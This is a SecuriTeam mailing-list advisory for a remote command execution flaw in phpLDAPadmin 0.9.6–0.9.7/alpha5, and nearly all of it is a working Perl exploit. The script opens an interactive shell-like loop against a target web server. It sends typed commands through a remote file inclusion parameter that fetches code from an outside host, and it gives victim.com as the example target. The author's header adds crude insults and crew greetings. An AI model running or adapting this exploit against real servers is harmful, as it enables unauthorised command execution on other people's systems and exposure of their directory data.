[EXPL] phpLDAPadmin Command Execution (Exploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

phpLDAPadmin Command Execution (Exploit)
------------------------------------------------------------------------

SUMMARY

" <http://phpldapadmin.sourceforge.net/> phpLDAPadmin is a web-based LDAP
client. It provides easy, anywhere-accessible, multi-language
administration for your LDAP server."

Lack of proper parameter filtering by phpLDAPadmin allows attackers to
cause the program to execute arbitrary code, the following exploit code
can be used to test your installation for the mentioned vulnerability.

DETAILS

Exploit:
#!/usr/bin/perl
#__________ ____ ________
#\______ \ ____ __| _/ \______ \____________ ____ ____ ____
# | _// __ \ / __ | | | \_ __ \__ \ / ___\ / _ \ / # | | \ ___// /_/ | | ` \ | \// __ \_/ /_/ > <_> ) | # |____|_ /\___ >____ | /_______ /__| (____ /\___ / \____/|___| /
# \/ \/ \/ \/ \//_____/ \/
# Coded By Johnnie Walker <whisky[at]bsdmail[d0t]org>
# Greets: sirh0t , Cute Eliisabeth And Tayphoon
# Suck My Dick: cobradriver , atmaca , kozan
# Red Dragon: Johhnie Walker . Nightmare . Erbil
# f0rtcu We Never f0rget You

use IO::Socket;

if ($ARGV[0] && $ARGV[1])
{
$host = $ARGV[0];
$path = $ARGV[1];
$target = $ARGV[2];

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host",
PeerPort => "80") || die "Can't connect!\r\n";
while (1) {
print 'RedDrag0n@'.$host.'$ ';
$cmd = <STDIN>;

if ($target == 2) {
$file =
"welcome.php?custom_welcome_page=http://sinanreklam.net/banner.gif?cmd="
}
chop($cmd);
last if ($cmd eq 'exit');
print $sock "GET ".$path.$file.$cmd." HTTP/1.1\r\nHost:
".$host."\r\nConnection: Keep-Alive\r\n\r\n";
$vuln=0;
while ($ans = <$sock>)
{
if ($vuln == 1) { print "$ans"; }
last if ($ans =~ /^_end_/);
if ($ans =~ /^_begin_/) { $vuln = 1; }
}
if ($vuln == 0) {print "Exploit Failed :(\r\n";exit();}
}
}
else {
print "phpLDAPadmin 0.9.6 - 0.9.7/alpha5 Remote Command
Execution\r\n\r\n";
print "Coded By Johhnie Walker\r\n\r\n";
print "Greets To sirh0t , Cute Eliisabeth And Tayphoon\r\n\r\n";
print "Usage: perl $0 <host> <path_to_phpldapadmin> [target_nr]
2\r\n\r\n";
print "Example: perl $0 victim.com /phpldapadmin/ 2 \r\n\r\n";
exit;
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:whisky@bsdmail.org> "Johnnie
Walker" .

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.